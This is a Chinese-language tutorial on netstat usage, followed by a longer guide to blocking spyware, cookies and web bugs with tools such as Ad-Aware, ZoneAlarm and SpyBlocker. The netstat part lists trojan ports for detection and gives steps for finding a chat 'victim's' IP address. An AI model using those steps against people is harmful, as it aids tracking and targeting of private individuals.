Proto Local Address Foreign Address State

TCP ankit:1031 dwarfie.box.com:ftp ESTABLISHED

协议（Proto）：TCP（是否用详细讲解，请来信）

本地机器名（Local Address）：ankit（这个是您在安装系统时自设的，本地打开并用于连接的端口：1031）

远程机器名（Foreign Address）：dwarfie.box.com

远程端口：ftp

状态：ESTABLISHED

-a参数常用于获得你的本地系统开放的端口，用它您可以自己检查你的系统上有没有被安装木马（要说一下：有很多好程序用来检测木马，但你的目的是想成为hacker，手工检测要比只按一下「scan」按钮好些----仅个人观点）。如果您Netstat你自己的话，发现下面的信息：
Port 12345(TCP) Netbus
Port 31337(UDP) Back Orifice

祝贺!您中了最常见的木马!

如果你需要木马列表的话，去国内的H站找找，我也有的，您要？

*****************************************************************

#一些原理：也许你有这样的问题：「在机器名后的端口号代表什么？」

例子：ankit:1052

小于1024的端口通常运行一些网络服务，大于1024的端口用来与远程机器建立连接，比如，你的浏览器在建立一个与www.163.com的连接，这时你的机器将打开一个随意的但大于1024的端口用于连接163的伺服器。

*****************************************************************

继续我们的探讨，使用-n参数。（Netstat -n)

Netstat -n基本上是-a参数的数字形式：

C:>netstat -n

Active Connections

Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 195.1.150.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 195.1.150.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT

通过比较，发现有两点不同。

1 -n参数命令用IP地址代替机器名。

2 我不确定，但经过再三的测试，Netstat -n命令不显示非TCP连接的数据。

-n参数通常用于查自己的IP时使用，也有些人使用他是因为他们更喜欢用数字的形式来显示主机名。难道这就是「数字化生存」？

得到IP等于得到一切，它是最容易使机器受到攻击的东东，所以隐藏自己IP，获得别人的IP对hacker来说非常重要，现在隐藏IP技术很流行，但那些隐藏工具或服务真的让你引身吗？答案是：它们不能使你完全隐身。下面例子用来简单说明如何获得IP。

OICQ或ICQ是很流行的聊天软件（很容易在MM身上浪费时间），他们虽然不显示用户的IP，但都是「穿马甲的IP地址」，用下面的方法得到其他用户的IP。

1 看一个DOS窗口，打入Netstat -n获得你系统已经打开的端口和远程连接列表。

2 然后打开OICQ，给「受害者」发信息。

3 当你们还在聊天的时候，返回DOS窗口，再打入Netstat -n命令，你将发现一个显示新连接的IP地址，这个就应该是「受害者」的IP。（也有其他的情况...)

到目前为止，我们讨论了『-a』和『-n』及一些应用，并发现在屏幕上返回和显示的连接不是一个详尽的协议。这意味着它显示了TCP连接，UDP等，假如你想看到那个连接属于UDP连接，你需要用-p参数。

通常的Netstat的-p参数格式如下：

Netstat -p xxx

xxx可以是UDP或TCP，我们用显示TCP连接的例子来理解如何使用-p参数。

C:>netstat -p tcp

Active Connections

Proto Local Address Foreign Address State

TCP ankit:1031 dwarfie.box.com:ftp ESTABLISHED

TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2

TCP ankit:1069 mail2.mtnl.net.in:pop3 TIME_WAIT

TCP ankit:1078 mail2.mtnl.net.in:pop3 TIME_WAIT

TCP ankit:1080 mail2.mtnl.net.in:pop3 TIME_WAIT

TCP ankit:1081 www.burstnet.com:80 FIN_WAIT_2

TCP ankit:1083 zztop.box.com:80 TIME_WAIT

这是个与-a，-n参数基本一样的变种。让我们继续看-e参数。

C:>netstat -e

Interface Statistics

Received Sent

Bytes 135121 123418

Unicast packets 419 476

Non-unicast packets 40 40

Discards 0 0

Errors 0 0

Unknown protocols 0

有些质量不好的modems不显示输出或接受的数据包，用这个命令可以解决这个问题，你也可以用它查看你的机器在处理TCP/IP过程中的错误。

我要讲解最后一个参数-r，这个命令有点难理解，而且涉及到其他方面的知识，我将在其他的教程中详细的讲解。下面我仅给出例子来理解-r参数。（在电脑方面，只要我们想做，我们就会有收获）

C:>netstat -r

Route Table

Active Routes:

Network Address Netmask Gateway Address Interface Metric

0.0.0.0 0.0.0.0 203.94.251.161 203.94.251.161 1

127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1

203.94.251.0 255.255.255.0 203.94.251.161 203.94.251.161 1

203.94.251.161 255.255.255.255 127.0.0.1 127.0.0.1 1

203.94.251.255 255.255.255.255 203.94.251.161 203.94.251.161 1

224.0.0.0 224.0.0.0 203.94.251.161 203.94.251.161 1

255.255.255.255 255.255.255.255 203.94.251.161 203.94.251.161 1

Network Address Netmask Gateway Address Interface Metric

0.0.0.0 0.0.0.0 203.94.251.161 203.94.251.161 1

127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1

203.94.251.0 255.255.255.0 203.94.251.161 203.94.251.161 1

203.94.251.161 255.255.255.255 127.0.0.1 127.0.0.1 1

203.94.251.255 255.255.255.255 203.94.251.161 203.94.251.161 1

224.0.0.0 224.0.0.0 203.94.251.161 203.94.251.161 1

255.255.255.255 255.255.255.255 203.94.251.161 203.94.251.161 1

Active Connections

Proto Local Address Foreign Address State

TCP ankit:1031 dwarfie.box.com:ftp ESTABLISHED

TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2

TCP ankit:1081 www.burstnet.com:80 FIN_WAIT_2

TCP ankit:1093 zztop.box.com:80 TIME_WAIT

TCP ankit:1094 zztop.box.com:80 TIME_WAIT

TCP ankit:1095 mail2.mtnl.net.in:pop3 TIME_WAIT

TCP ankit:1096 zztop.box.com:80 TIME_WAIT

TCP ankit:1097 zztop.box.com:80 TIME_WAIT

TCP ankit:1098 colo88.acedsl.com:80 ESTABLISHED

TCP ankit:1099 mail2.mtnl.net.in:pop3 TIME_WAIT


斩杀间谍精要--必备的三种免费利器
作者： 电脑工程师 斩妖魔
  (1)AD-AWARE,使用此软件扫荡系统,清除间谍滋生繁衍的环境.像网络蚂蚁,网际快车等常用免费软件都携带间谍程序.这些软件又不能不用,怎么办?安装后,用AD-AWARE清理系统,把捆绑在其他程序(如IE,或EXPLORER)的间谍清除.捆绑在IE,或EXPLORER是便于搜集用户的浏览习惯等资料,又可进行秘密传送信息.一般IE是允许上网的!
    (2)使用好的防火墙,而且必须是ZONEALERM防火墙.因为有很多防火墙提供了“虚假的保护”.这里就不点名了,包括国外很有名的防火墙。这是因为它们只注重拦截外来的黑客攻击，却忽视了对内部泄露的防范。
    一定要严管自己的防火墙.下面介绍一下应用:
    在ZONEALERM防火墙的PROGRAM栏目中,列出可通过防火墙的软件.一般最好把不用的程序移出,如EXPLORER或网络蚂蚁等,点击要选定的程序,点击鼠标右健弹出菜单,选择REMOVE EXPLORER或NETANTS等,之后会弹出确认对话框,选择YES.有程序要上网时,防火墙就会弹出对话框,进行询问.如果对有些程序不进行移出的话,这些程序就
会直接通过防火墙访问互联网而不被用户察觉.如有可疑程序的询问对话框出现时,就要警惕了.如有可疑程序的被防火墙拦截并进行询问是否允许通过防火墙时,此时可断开网络连接,运行网络连接状态监视器,让防火墙使可疑程序通过,监视器就会记录可疑程序要访问的IP.NETSTAT命令也能记录ip,但是记录可能不完整.原因间谍程序连接主机非常快的,NETSTAT很难补捉到ip.最好是两秒中能记录一次的专门的软件.注意一定要先断开网络连接,然后在让防火墙通过该可疑程序,这样您的个人信息就不会泄露了.更加注意的是:可疑程序连接结束后,一定要把该可疑程序移出PROGRAM栏目,避免下次上网时该程序自行通过防火墙.PROGRAM栏目中的程序有三个选项:对号(允许通过),差号(不许通过),?(询问).用鼠标点击几个并行的小点即可.
    (3)SPYLOCKER,进行拦截其他网络上有关资料收集的有害程序.非常简单.祥见有关说明.注意及时更新HOSTS文件.
    间谍防火墙------SPYBLOCKER
    间谍防火墙是我给出的名字,它没有内置防火墙,却能起到类似防火墙的作用.能阻挡"间谍"的传输,因而我叫他间谍防火墙.SPYBLOCKER是设计用来在互联网上保护个人隐私的工具.当我们使用SPYBLOCKER在互联网上冲浪时,SPYBLOCKER能将广告及追踪行为阻挡下来,还会将阻挡的次数,事件详细记录下来.,可以看到到底有多少次渗透.这个免费的工具能阻挡已知的800个"间谍软件".目前许多网站都有吸引人的广告,有的网站会在您的浏览器中设置cookie及其他文件;更有甚者,使用网络爬虫或其他方法收集你的个人数据,计算机资料及上网习惯等.
SPYBLOCKER能监控这些网络活动,并能从传输的和接收的旗帜广告以及跟踪系统中封杀这些"间谍".同时也能将广告(间谍)软件中的广告阻挡,用用户自己选择的图表代替广告.也不对间谍程序的文件进行任何修改,所以不影响宿主程序运行.SpyBlocker 与广告过滤软件、所有的防火墙程序、浏览器、各版本的Windows 操作系统都兼容，能阻挡广告、cookies、web bugs。SpyBlocker。
    能阻挡的广告系统有:Timesink/Conducent,Aureate/Radiate,Comet,Web3000,Cydoor,FlyCast,SpeedBit,QualComm.
    SPYBLOCKER会更改hosts文件,将已知的广告软件中的广告主机服务器全部指向127.0.0.1,间谍传输将失效.广告主机数据需要经常更新,您也可以自己编辑hosts文件,将新的广高主机加进去.如果你决定关闭SpyBlocker和无防护做冲浪运动就需要用手工删除你的主文件。hosts文件位置在:Windows 95, 98 or ME 系统，在'c:\windows\hosts',Windows NT，2000或XP系统上在'c:\winnt\system32\drivers\etc\hosts', 最好让SPYBLOCKER跟随计算机启动或关闭,平时不要关闭他,使其能对间谍软件或浏览器运行时就进行监视.为了阻止黑客的窥视,最好安装一个防火墙,如:zeroalarm.使SPYBLOCKER在防火墙后运行.SPYBLOCKER拦阻这些信息时,系统托盘(任务栏)显示的图标(一个间谍的头像,头像上有一个红色的X)会变成一眨一眨的绿眼睛.
    咨询信件：pkurland@bellsouth.net
    SPYBLOCKER
    运行平台 WIN9X/2000/me/NT/XP
    文件大小:1.9M
    版本:4.71
    免费软件下载地址:http://personal.mia.bellsouth.net/mia/k/r/kryp/SB.ZIP

    下面是简要说明:
    注:在Windows 2000或XP使用方法见:http://www.morelerbe.com/spyblocker/w2k.htm
    主界面:
    (一)Log file configuration(日志配置)
    (1)keep a log file,在该项前打勾,表示生成一个日志文件.
    (2)delete,删除日志文件按钮.没有日志文件,显灰色.
    (3)view,查看日志文件按钮.没有日志文件,显灰色.
    (4)browser,创建新的日志文件或选择已存在的日志文件.左边的是日志文件路径.

    (二)program option(程序选项)
    (1) auto start with windows,在该项前打勾,表示当windows启动时,SPYBLOCKER自动运行.
    (2)Maximum Security：保证最大安全。在该项前打勾,Spyware对广告或信息文件加倍核对。主要在硬盘和已删除软件上藏起来的广告或信息文件进行核对。建议选择此项。
    (3)Skip Intro,在该项前打勾,Spyblocker将避免弹出主界面。
    (4)Don't Monitor Web Browsing：不监视网络浏览。如果选择，Spyblocker将仅仅监视使用广告的软件,不监视网页浏览。建议选择此项.右边的3个按钮:list,reset,setuplist:点击此按钮弹出summary对话框,显示拦截的状态框.下面由三个按钮(unblock(不拦截),clear(清除),close(关闭对话框))reset:点击此按钮弹出询问对话框,问你是不是把所有的计数器置0(yes:是,no:不)setup: (A)BLOCKED URLS(拦截地址表),该列表内的地址都被拦截.FIND(查找):在HOSTS(也就是上面的列表)查找地址串,如FIND WHAT(查找内容)FINED NEST(查找下一个),查找时要把全部的都找到,要点击FINED NESTCANCEL(关闭对话框).查找完成后,在列表中含有查找内容的地址都将被选中.Unblock Checked:此项是把选定的项目从当前主机列表中删除。并加入不进行阻止的主机列表中。(B)UNBLOCKED URLS(不拦截地址表)Block Checked：此项是把选定的项目从当前主机列表中删除。并加入进行阻止的主机列表中。(C)USER defined blocks(自定义拦截项目)Remove Checked： 在用户定义列表中删除选定的项目。Import：导入地址表，允许您合并另一个拦阻的主机文件。这样所有的ip都将指向http：//127.0.0.1。Apply，是用来加入用户定义的拦截地址,在add url中加入地址,点击Apply该地址将加入一览表真实的URL，点击'Current Additions' 。Merge Hosts，合并另一个hosts文件。（注：不改变IP地址）Browse，是查找并合并的目前的主机文件。(D)OK：同意，Save，存盘并关闭界面，Cancel，取消,并关闭。

    (三)statistics:显示拦截不安全
    cookie,bugs,spyware,ads,scripts,worm的数量.

    (四)port status(端口状态),监视本机的端口80.

    鼠标右键点击托盘图标,弹出:
    其他有关的说明:
    (1)limit logfile size(记录文件最大为50k。选择是限定文件的容量，不选择是不限定文件的容量。如果你不限定选文件的容量，那么只能用手工删除它)
    (2)Don't Allow Remote Connections：不允许Spyblocker远程连接。
    (3)Replacement Graphic：替换的图表，选你想替换（Transparent（透明）, Black（黑）, Blue（蓝色）, Green（绿色）, Red（红）, White（白） 或 Bug（故障））的图标。
    (4)reset all counters,将所有计数器置0.
    (5)SpyBlocker升级有2个方法。
    第一个方法：卸载现在使用的程序，根据安装的命令在上面重新安装最新的版本。
    第二个方法：利用的SpyBlocker更新模数。注：必须在同一文件名和统一文件夹下安装新版本。这方法不须卸载原程序，直接就可升级。
    如何安装Update feature？Update feature是与主程序分开的一个插件。如下步骤：
    1)SB-Updater
    下载地址：http://www.morelerbe.com/spyblocker/sb-updater.exe
    2)确认你不改变文件名（sb-updater.exe），，必须保证在SpyBlocker.exe所在的文件夹中保存这个文件。（即通常‘'c:\program files\spyblocker' 或 'c:\program files\spyblocker software')
    3)重新启动SpyBlocker。)
    (6)如何安装acFile钮？
    PacFile Generator是与主程序分开的一个插件。
    如下步骤：
    1)PacFile Generator
    下载地址：http://www.morelerbe.com/spyblocker/iblock.exe。
    2)确保不能改变文件名（如：iblock.exe），必须保证在SpyBlocker.exe所在的文件夹中保存这个文件。（即通常‘'c:\program files\spyblocker' 或 'c:\program files\spyblocker software')
    3)重新启动SpyBlocker。
    (7)如果我想访问SpyBlocker拦阻的站点？SpyBlocker的设置是完全可变，SpyBlocker拦阻的任何站点东西都能被免除。下面是如何免除的步骤：
    1）在主界面上单击'Setup'钮。
    2）单击'Find'
    3）‘find’窗口出现，输入要访问的站点.
    4）一定要寻找全部记录，可能有的站点地址不止一个。
    5）你已经在数据库中找到该站点，'Unblock Checked'按钮单击。
    6）单击‘保存’钮。
    7）你必须清除你的浏览器cache文件夹和重新启动机器。
    8）现在你能到以前被拦阻的站点去冲浪了。
    (8)如何知道SpyBlocker是否正常工作,请测试:
    测试地址：
    1.测试'Spyware'地址 ：http://www.conducent.com/,'Spyware' 计数器变为1.
    2.测试'local connections' 地址 ：http://127.0.0.1/,'Total Blocked Headers' 计数器变为1.
    3.测试'web bugs' 和 'ads'地址 ： http://a.r.tv.com/cnet.1d/css/1.css,'Bugs'和'Ads' 的计数器都将变为1.
    4.测试'cookies' 地址 ：http://ads3.zdnet.com/i/g=r2367&c=a67539&idx=2001.09.14.13.17.01/
                           http://images.zdnet.com/adverts/imp/c22962/MS_general_728x90_081501.gif,'Cookies' 和 'Ads'都变为1.
    5.测试'Advertisements' 地址 ：http://ads.doubleclick.com/ ,'Ads' 计数器变为1.

    三个软件完美结和,天衣无缝.间谍有来无回.

    揭开间谍真面目

    首先声明:互联网上任何组织或个人无任何权力和理由,去偷窥合法用户的隐私内容.用户的私人资料,被当作商品一样随意买来卖去.甚至各种收集资料的所谓的商家,不顾任何法律条文,任意向合法及非法的买家出售统计数据,甚至是非法买家的马前卒.这些数据将严重危及用户自身安全,因此整理此类文章,保障用户基本权益.这些都是间谍行为!在互联网上除了利用各种漏洞的木马,病毒直接对用户进行入侵外,各种嗅探,侦听程序也层出不穷.除了这几种方式外,还有几种不为人知的几种方式:,下面详细介绍:

    (一)网站的窥视:
    (A).网站是通过IP作为中介与用户交互信息.你的计算机在网上每发一个数据包,都有一个您自己的IP地址,也包括网站的IP地址,这样才能互相收到各自的信息.如果使用的是永久连接方式(如:专线,宽带),那您的IP很可能固定不变.这样如您在网上移动时,窥视者就可通过IP进行跟踪.收集您在网上的踪迹,比如:您都去过什么网站,做过什么事情等等.网站本身也可对您进行统计,然后出售给任何想要的人.
    (B)如果是拨号用户,每次拨号,ISP分配给你的IP每次可能都不同.而且所有的机器都在防火墙后面,这样IP就不能很好的对用户进行识别辨认,于是COOKIES出现了.邮箱或论坛等等进行登陆,都需要有个COOKIE.服务器就将一个对您进行识别和描述交易的COOKIE放在了您的机器上,这样服务器就能记住您是谁,做过什么事情.有一种是关闭浏览器就会消失的暂时COOKIE,另一种是可能保留数月或更长时间的持久COOKIE.这种COOKI非常方便,服务器可以通过您的机器上的COOKIE对您进行识别.那么服务器中的有关你的旅程中的全部信息,有可能通过合法或非法的方式被人收集,整理,因此要选择信誉和知名度比较的站点.

    (二)不安全的COOKIE:
    (A)"拼凑"的网页:
    一个网页可能包括文本,图片,广告,FLASH等等部件组成.这些部件可能分别来自于不同的服务器.浏览器通过网页编辑的语言模式从不同的服务器调出所需部件,拼凑成现在的页面.这些不同的服务器都可以向您的机器分别发送各自的一个COOKIE,稍候收回.如:访问含有广告的网站,由于每次访问页面,广告公司都会发一个COOKIE.当您从一个网站转到另一个网站,如果这两个网站都含有同一广告公司的广告,该广告公司就可通过它的COOKIE看到您从一个网站转到另一个网站.假如:广告公司从网站所有者那里得到你的有关个人信息,她就可在你访问另一个页面使用此信息.然后进行收集整理.
    (B)邮件的COOKIE:
    在互联网上,COOKIE窥视不受限制.在网络浏览器中使用翻译引擎,有的同时也编进了邮件的客户端程序及新闻组.这样别人给您的电子邮件或HTML文章贴在新闻组.当您阅读邮件(或文章)时,你的机器会访问她或他机器的图片.随即发送者即可知道您看了什么消息,如果消息中定制了URL,内含邮件地址,就将知道您是谁.除非修正了安全漏洞,否则就能通过COOKIE进行个人信息收集.
    (C)计算机中的安装软件有的也能把信息放在COOKIE中,以便稍候收回.如:WINDOWS 98的注册向导.注册向导的ACTIVEX控件还有个漏洞,允许任何网站随意收回这个COOKIE中的注册信息,因为COOKIE中放有注册信息.
    (D)预防不安全的COOKIE方法:
    (1)全面禁止使用COOKIE,一般浏览时把COOKIE全部禁止.主要在浏览器的属性中修改,使其禁止.一般不会有什么麻烦,但如进行各种登陆,就需要COOKIE进行识别.
    (2)选择阻塞或禁用COOKIE,如:使用webwasher软件,Internet Junbuster Proxy软件,都能阻塞网络服务器发送的cookie,不影响正常登陆.像cookie crushera也能让您自己控制那个网站可保存cookie.这些软件不能阻止JavaScript,Java程序的cookie.如果选择性阻塞cookie,要经常删除C:\WINDOWS\Temporary Internet Files内的COOKIE文件,C:\WINDOWS\Cookies内的文件.像cookie:xxxxx@ads.sohu.com都是不安全的cookie,也含有独一无二的id标记:如XXUserIDxxxxxxxx-xxx-xxxxxxx-xads.sohu.com/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
    (3)防止cookie通过电子邮件放置在你的机器上,不要选用察看邮件是自动调用网络服务器的翻译引擎的邮件程序.如果是outlook或outlooke express,你只能用IE的翻译引擎.但其它的邮件客户端程序就会给你一个选择,请不要选中微软的阅读器的复选框,那样就不会调用IE察看邮件.COOKIE就不会对你进行跟踪.
    (4)IDcide的IDcide Privacy Companion免费浏览器插件,能有效解决这个问题,但没有IE6.0版.
    说明祥见"防范网络追踪"地址：http://www.internetfreedom.org/gb/index.html　http://worldfreenet.org/gb/index.html
    (5)IE6.0的COOKIE选项也能有效解决这个问题.IE的属性的隐私,可对COOKIE选择:
    a.最高:是全部禁止,不能被任何网站写入或读出任何信息.
    b.高:阻止使用个人可标识信息而没有明确许可的COOKIE.
    c.中高:阻止使用个人可标识信息而没有明确许可的第三方COOKIE,阻止使用个人d.可标识信息
而没有隐含许可的第一方COOKIE.
    e.中:阻止使用个人可标识信息而没有隐含许可的第三方COOKIE,阻止使用个人可标识信息而没有隐含许可的第一方COOKIE.
    f.低:限制使用个人可标识信息而没有隐含许可的第三方COOKIE.最低是接受所有COOKIE.
    (7)使用间谍防火墙--spyblocker,说明见下.
    (三)硬盘中的间谍:
    (1) 硬盘中怎么会有间谍呢?原因是我们安装了不友好的程序.绝大多数是共享软件或免费软件带来的.共享或免费的条件是帮助广告商收集个人资料来换取广告商的资助.这些间谍是在安装原始的共享或免费程序的同时
被安装.共享或免费应用程序通常称为宿主程序.即使卸载宿主程序,间谍也会留在计算机中,原因是宿主程序的卸载模块不含有间谍部分,不能被卸载.间谍常常进驻注册表中,在后台秘密工作,并在每台微机"刻"上独一无二的id标识,这种标识一般在注册表中.间谍程序主要监视点击的广告,用户使用那些程序,访问过那些网站,扫描注册表,搜集各种个人信息.即使卸载或不运行宿主程序,或者已经离线,也会继续搜集资料.当你上线时,间谍程序就被唤醒,秘密与远程服务器通信,上传用户资料.
    注意:一般这类软件,在安装过程中没有提示,安装结束时,在告诉您已经安装广告支持软件.这种间谍没有专门的清除程序,用户是无法清除的.
    (2)一些合法的应用程序在特定条件下,也会收集或暴露个人信息.如互联网再线聊天系统(IRC)的客户端程序,使用identd协议,允许互联网的任何人询问你是谁.许多ISP同样使用identd协议.有一些软件本身也在收集用户浏览习惯,或其它一些信息.如:Realplayer软件,可以监测消费者察看内容.但该公司有一个补丁可以禁止这种窥探行为.
    (3)预防方法:上面提到的第(2)一些合法的应用程序在特定条件下,也会收集或暴露个人信息的解决方法目前不能预防,只能不去用这些工具.下面对(1)的解决方案有几种:
    (A)到正规的站点下载软件:如ZDNET网站下载软件,含有间谍程序的软件都已被注明.如果下载不清楚,注意程序安装过程中要求的许可协议和注册信息.有很多免费软件的用户注册表格是为间谍软件统计数据的来源.如果应用程序的用户界面含有旗帜标栏广告的都可能在使用间谍成序.
    (B)介绍两款清除间谍程序的工具:
    (1)Gibson公司的Optout软件.但是我只看到过期的测试版,不知道有没有新的版本,也是免费的软件.这个工具可以扫描硬盘,注册表,也能删除或隔离间谍程序,宿主程序不口影响.
    下载地址:http://grc.com/files/optout.exe.
    (2)lavasoftusa公司的Ad-aware软件也能对内存,注册表,磁盘进行扫描.也能进行彻底清除,但最好备份一下.我试过感觉不错,几乎不影响其它程序,但我的浏览器(IE),出了的小问题,也能正常使用!建议是反安装当前的IE版本,使用该程序进行对间谍程序处理,然后在安装当前的版本,这个小问题就没了.但我认为是间谍程序被捆绑在IE的相关程序中了!
    下载地址:http://www.lavasoftusa.com/
    总之:本人观点是断点续传软件,网上交流软件,搜索软件等类型的软件,很多暗藏玄机.
    (C)善用防火墙:如Zeroalarm防火墙,能监视所有的因特网的通信量,可以阻止任何未经授权的数据传递,也能隔离程序传递信息.但有时间谍程序捆绑在常见的程序中,防火墙就不能很好的处理,那样防火墙就允许间谍程序通过,最好是把间谍程序删除后,对防火墙进行设置,如捆绑在:C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE,C:\WINDOWS\NOTEPAD.EXE,C:\WINDOWS\EXPLORER.EXE很难发现.使用工具清除间谍程序后,也要善用防火墙.如只使用浏览器浏览,那就不能让其它程序通过!把防火墙的安全设置为最高,对间谍主机服务器地址进行拦截:
    步骤:
    (1)运行注册表(regedit),运行"C:\WINDOWS\regedit.exe"或在开始菜单,运行中添入:regedit,打开注册表.
    (2)找到充当间谍的注册表项,如:aureate项,可用注册表的搜索查找.
    (3)找到后,记下默认的广告(间谍)主机服务器的主机地址.
    (4)在防火墙中进行地址拦截,如zonealarm，在主界面的security(安全)选项下的configure(配置)中的restricted zone中用add(加入)地址.
    简便的方法:就是把spyblocker软件中所要拦截的主机服务器都加进去.
    (D)使用间谍防火墙----SPYBLOCKER,拦截所有间谍程序.
    (四)网络爬虫(web bugs),这是更加难缠的角色.也叫网络臭虫.,是跟踪网上冲浪和浏览习惯的更加隐蔽的方法.网络爬虫是很小很小一个图片,也可能是一个小点,它被植入网页或html编写的网页中.是非非常隐蔽的小程序,很难发现.当用户浏览含有网络爬虫的网页时,网络爬虫会自动给您的系统做一个独一无二的ID标识,有的在您的计算机中放置COOKIE,然后源源不断的把你的有关信息传递给远端服务器,比如浏览了哪条新闻等,远端服务器就可对你的资料进行处理,统计.网络爬虫更恶劣的是不能被COOKIE过滤软件过滤,因此网络爬虫的危害超出COOKIE.
    解决方法:
    (1)Dcide公司的IDcide Privacy Companion，其它同上。
    (2)使用间谍防火墙----SPYBLOCKER,拦截所有web bugs.
    (五)四处游荡的代码:有很多网站内含有非常不友好的代码,这些代码通常是JavaScipt或VBSScipt语言编写而成.这些小段代码能将一些小文件下载到你自己的机器上.这些文件可能为病毒,木马或一个脚本,它能搜集您的信息,返回给需要的人.大家清楚,最近网络上的恶性代码异常嚣张,能对注册表等等进行操作.我测试过一段代码,居然我的诺敦防火墙没有和最好的黑客防火墙都没有反应.这不是说这些防火墙不好,这些防火墙不是用防这些代码的.像诺敦也能防恶性代码,可是我测试的代码可就不简单了.
    防范方法:
    (1)将浏览器的安全设置为最高,这样ACTIVEX和JAVASCIPT就禁止运行,文件下载也为禁止.
    (2)删除WSH(Windows Scripting Host),像欢乐时光就是一个典型.免疫步骤是：单击"开始"->"设置"->"控制面板"->"添加/删除程序"->"Windows安装程序"--"附件",将"组件"中的"Windows scripting host"“选择划勾”去掉,然后"确定"即可。
    (3)注册表加锁：禁止修改注册表。加锁方法如下：
     (a)运行注册表编辑器regedit.exe；
     (b)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下，新建一个名为DisableRegistryTools的DWORD值，并将其值改为“1”，即可禁止使用注册表编辑器regedit.exe。解锁方法如下：用记事本编辑一个unlock.reg文件，内容如下：REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000，存盘。你就有了一把解锁的钥匙了！如果要使用注册表编辑器，则双击unlock.reg即可。
注意:，在“REGEDIT4”后面一定要空一行，并且“REGEDIT4”中的“4”和“T”之间一定不能有空格，否则将前功尽弃！
    (4)下载Microsoft Windows Script 5.6,是个浏览器脚本补丁.包括VBScript、JScript、Windows Script Components、Windows Script Host 、Windows Script Runtime 、Windows Script Host 等等一些改进。能解决脚本的一些问题，这个代码的解决方案没有进行过测试，琢磨使用。
    (六)各种软件留下的痕迹:
    (1)像浏览器留下的缓存,历史等的记录.用Window Washer 4.1(目前最高版本)清理系统,是个付费的东东.新版本增加了对密码,浏览后的颜色等等清除.强烈建议使用,能彻底粉碎记录.地址:http://www.webroot.com,不要忘了付费.
    (2)文件的删除用erase软件.一般的删除只是在文件分配表把文件名删除了，实际上内容还在。有的格式化也不行，就像围棋的棋子，黑白分明，用涂料涂了一变，黑的白的是不是还能看出来。必须是全部置为"1"或"0",可随机覆盖.erase软件就是这样的东西,新版能把文件名彻底删除.
    (3)各种文件的打开使用记录,像Word、Realplayer、Winzip、Windows的打开路径,最近使用的文件等等都有记录,虽然可以把文件的内容删掉,但这些软见使用的文件名是逃不掉的.网络蚂蚁,网际快车等断点续传工具都对下载的文件日志等有记录.防火墙也有使用各种程序的记录,即使把防火墙的程序删除,但它的日志确有详细记录.这些记录都不能彻底清除,怎么办?
    方法一:使用Window Washer的Plugin清理. 要想清理这些“间谍”，需要先下载相应的Plugin，然后安装就可以了。但是你必须有Window Washer主程序.
    Plugin下载地址：
    http://www.webroot.com/plugin_aj.htm,表示软件名称的第一字母范围是(a-j).
    http://www.webroot.com/plugin_kp.htm,表示软件名称的第一字母范围是(k-p).
    http://www.webroot.com/plugin_qz.htm,表示软件名称的第一字母范围是(q-z).
    有插件的软件表如下:怎么还不动手我们经常用的都在呀!

    (A)a打头:ACDSEE32 ,Addsoft ,Addweb 3 ,Adobe Acrobat Reader 3.x,Adobe Acrobat Reader 4.x,Adobe Acrobat Full 4.x,Adobe Photoshop 5.x/6.x ,Allaire Homesite 4.x,AOL Instant Messenger,AOL Temporary Download Folder ,Animation Shop 1.x and 3.x ,AudioCatalyst ,AudioGrabber ,Axialis Media Browser
    (B)b,c,d,e,f打头:Babylon ,Bookreader ,Chameleon Web Browser ,Classify 98 (Trellian Software) CoolEditPro,Copernic 2000 ,Corel Photopaint 8 ,Cute FTP ,Cute MX ,CRT 2.x,Diskeeper by Executive Software ,Download Accelerator, EditPad,Enigma Browser ,Eudora by Qualcomm,Fix-It 2000,Fireworks 3 and 4 ,FlashGet(JetCar),Forté's Free Agent,Freecell (MS Windows),Front Page Express,FTP Voyager
    (C)g-l打头:Gator ,GetRight,Go!Zilla,GoldWave Editor,Google Toolbar ,Gravity Newsreader ，Graphic Workshop Pro,Hot Java Browser 3.0,ICQ 98a,ICQ 2000 ,IE Default Save Location ,Inoculatelt PE Virus Scan ,InterQuick,Irfanview 32,Juno,Kodak Imaging for Windows,Letterbox ,LingoMail 1.x,LView Pro 2.x
    (D)g-m打头:,Macromedia Dreamweaver 3 and 4 ,MGI Photosuite SE 1.x,MIRC ,Micrografx Picture Publisher 8,Microsoft Photo Editor 3.0,Microsoft Front Page,Microsoft Visual Studio ,Microsoft Windows Media Player,Microsoft Windows Paint,Microsoft Windows Word Pad,MSN Explorer Browser 6 ,Microsoft Word Backup Files ,MSWorks 4.0,Mijenix Powerdesk 3,MusicMatch Jukebox
    (E)n-s打头:,Napster,Naviscope , NeoPlanet ,NetAnts,Netmeeting,Netsonic,Netzip Download Demon ,Norton Anti-Virus 2000 ,NoteTab Series ,Opera 3.x Web Browser,Opera 4.0 and 5.0 Web ，Browser,Onespace by Enfish ,Outlook Express 5.x,Paint Shop Pro ,PhotoDraw 2000,PhotoExpress ，PhotoImpact ,PhotoImpact Viewer,Powerdesk 4,PKZip for Windows,PowWow by Tribal Voice ,Psion Psi-Win　2.x,RealDownload,RealPlayer G2/6.x/7.x/8.x,SearchWolf by Trellian,Scour Exchange ,Sonic Foundry's Acid 2.0,Sonique,Spinner Plus,StarOffice,SubmitWolf by Trellian,SubmitWolf DE by Trellian。
